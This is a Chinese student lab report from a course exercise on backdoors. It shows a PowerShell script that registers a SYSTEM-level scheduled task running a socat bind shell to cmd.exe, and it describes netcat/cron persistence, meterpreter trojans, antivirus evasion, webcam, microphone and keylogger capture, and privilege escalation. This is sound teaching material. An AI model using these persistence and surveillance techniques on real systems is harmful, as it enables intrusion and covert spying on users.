首页 > 其他分享 >20212217刘恒谦-Exp2 后门原理与实践

20212217刘恒谦-Exp2 后门原理与实践

时间:2024-03-22 20:56:54浏览次数:30  
标签:后门 windows Exp2 Linux 使用 木马 kali 刘恒 20212217

实践过程记录

使用netcat获取主机操作Shell,cron启动

​ ncat即Netcat,可以收发传输层数据,由攻击者使用。cron是Linux中用于按计划执行脚本的工具,在网络对抗中让受害者连接不稳定时,重连攻击者,由受害者启动。
​ 既然如此,受害者需要是Linux,否则没有cron命令,我购买了一台阿里云Ubuntu服务器充当受害者。使用crontab -e编辑如下计划:

​ 这样,每天凌晨2点,受害者就会开放5555端口,等待攻击。
​ 之后,内网中的kali正向连接公网服务器,获取shell权限。

使用socat获取主机操作Shell, 任务计划启动

​ socat可建立双向通道,支持众多协议和链接方式,可以看成ncat++,在linux中一般都支持该命令。
​ 任务计划是windows中的任务形式,windows作为受害者,需要用socat接收kali传来的命令。
​ 既然要进行网络通信,且为正向连接,就需要知道受害者的IP:

​ 最下一行代表WLAN局域网的IP,为192.168.56.1。

​ 之后,在windows中以管理员身份打开powershell ISE,编写脚本创建任务。

# 定义任务的触发器(例如,每天凌晨 2 点执行)
$trigger = New-ScheduledTaskTrigger -Daily -At 2am

# 定义任务的操作(例如,运行 PowerShell 脚本)
$action = New-ScheduledTaskAction -Execute "D:\socat\socat.exe" -Argument "tcp-listen:2217 exec:cmd.exe,pty,stderr"

# 定义任务的权限(可选,默认为当前用户)
$principal = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY\SYSTEM" -LogonType ServiceAccount

# 定义任务的设置(可选)
$settings = New-ScheduledTaskSettingsSet

# 注册新任务
$taskName = "lhq20212217exp2"
$taskDescription = "网络对抗实验二"
Register-ScheduledTask `
    -TaskName $taskName `
    -Action $action `
    -Trigger $trigger `
    -Principal $principal `
    -Description $taskDescription `
    -Settings $settings

​ 为了加快实验进度,我使用管理员模式的powershell即刻执行了任务。

​ 之后,在kali-wsl中使用socat - tcp:192.168.56.1:2217即可获取windows的cmd权限。

使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

​ 首先生成木马文件,通过socat传输到windows主机上:

​ windows主机接收文件到火绒信任区,避免误杀:

​ 之后,在windows中运行该木马程序,返回Ubuntu,通过Ubuntu快速安装MSF - tomyyyyy - 博客园 (cnblogs.com)教程安装msfconsole,并连接木马

使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

​ 本步骤需要在上一步基础上进行,中途不可退出。由于公网服务器没有图形界面,我使用了在线网页的形式下载音视频等窃取到的数据。

音频(record_mic)

​ 输入record_mic可截取1秒的音频。

截屏(screenshot)

​ 输入screenshot可截屏,图片以jpeg的形式保存起来
​ 看起来并不是很清晰

拍照(webcam_snap)

​ 输入webcam_snap拍照,相比于截屏,照片就清晰多了:

录制键盘(keyscan_start,keyscan_dump)

​ 使用keyscan_start开始录制,接着用keyscan_dump结束,我在这期间只按了一次Ctrl C。

提权(getuid,getsystem)

​ 这一步要求使用管理员身份运行木马,之后在攻击机中先使用 getuid 指令查看当前用户,再使用 getsystem 指令进行提权。
​ 不过在本次实验中,提权后仍然无法查看敏感信息。

使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

​ 在MSF中通过-x file_path参数可按指定文件模板生成木马,这次的木马与上次不同,需要在Linux上运行。

​ kali-WSL就是一台Linux,可以充当受害者,在kali-WSL中,通过wget下载公网上的lhq20212217_pwn_backdoor,并赋权执行:

​ 之后,到Ubuntu攻击机中,使用MSF连接木马:

成功入侵Kali

标签:后门,windows,Exp2,Linux,使用,木马,kali,刘恒,20212217
From: https://www.cnblogs.com/cyber-explorer/p/18090398/exp2-lhq20212217

相关文章

  • PentestLab-web安全XML测试-EXP2
    我们打开靶机选择“example2”观察页面我们尝试修改name参数http://192.168.20.157/xml/example2.php?name=hacker%27添加单引号报错存在闭合的可能性网上大神payload为hacker'or1=1]/parent::*/child::node()%00完整的payload为http://192.168.20.157/xml/example2.php?name=ha......
  • PentestLab-web安全LDAP测试-EXP2
    我们打开靶机选择“Example2”观察页面尝试匿名登陆报错我们分析靶机源码网上大神分析当然了,如果在不知道用户名为admin的情况下,可以使用上文所说的*来进行模糊匹配。比如a*)(%26))%00&password=xpayload为http://192.168.20.157/ldap/example2.php?name=admin)(%26))%00&password......
  • PentestLab-web安全命令注入-EXP2
    我们打开靶机选择“Example2”观察页面我们尝试http://192.168.29.148/commandexec/example2.php?ip=127.0.0.1;ifconfig结果我们尝试%0a于是payload为http://192.168.29.148/commandexec/example2.php?ip=127.0.0.1%0acat%20/etc/passwd结果我们观察靶机源码使用了正则来匹配IP地......
  • PentestLab-web安全文件包含-EXP2
    我们打开靶机选择文件包含页面,选择“Example2”观察页面尝试更换page参数http://192.168.29.148/fileincl/example2.php?page=/etc/passwd结果如下提示目前不存在继续尝试,......
  • 网络对抗Exp2-后门原理与实践
    目录实验基础基础知识实验目标实验环境在主机上用ipconfig查看Windows11主机IP在Kali虚拟机中用sudoifconfig查看Kali虚拟机IP实验过程一、使用netcat获取主机操作Shell,启......
  • 20201326_exp2_后门原理与实践_实验报告
    20201326EXP2-后门原理与实践一、实验基础实验目的本次实验需要我们掌握后门的基础知识,学习使用nc实现Windows,Linux之间的后门连接,学习使用Metaspolit的msfvenom指令......
  • Exp2-后门原理与实践
    目录1.基础问题问答2.实验总结与体会3.实践过程3.0Ncat的一些使用与尝试3.0.1Windows获取kali的shell3.0.2kali获得Windows的shell3.0.3kali向Windows中传输文件3.0.......
  • Exp2-后门原理与实践
    一、实验内容1.使用netcat获取主机操作Shell,cron启动2.使用socat获取主机操作Shell,任务计划启动3.用MSFmeterpreter(或其他软件)生成可执行文件,利用ncat或socat传送......
  • 《网络对抗技术》——Exp2 后门原理与实践
    一、实验准备1、实验要求使用netcat获取主机操作Shell,cron启动使用socat获取主机操作Shell,任务计划启动使用MSFmeterpreter(或其他软件)生成可执行文件,利用ncat或soc......
  • 20201306——Exp2 后门原理与实践
    一、实验准备1、实验要求使用netcat获取主机操作Shell,cron启动使用socat获取主机操作Shell,任务计划启动使用MSFmeterpreter(或其他软件)生成可执行文件,利用ncat或soca......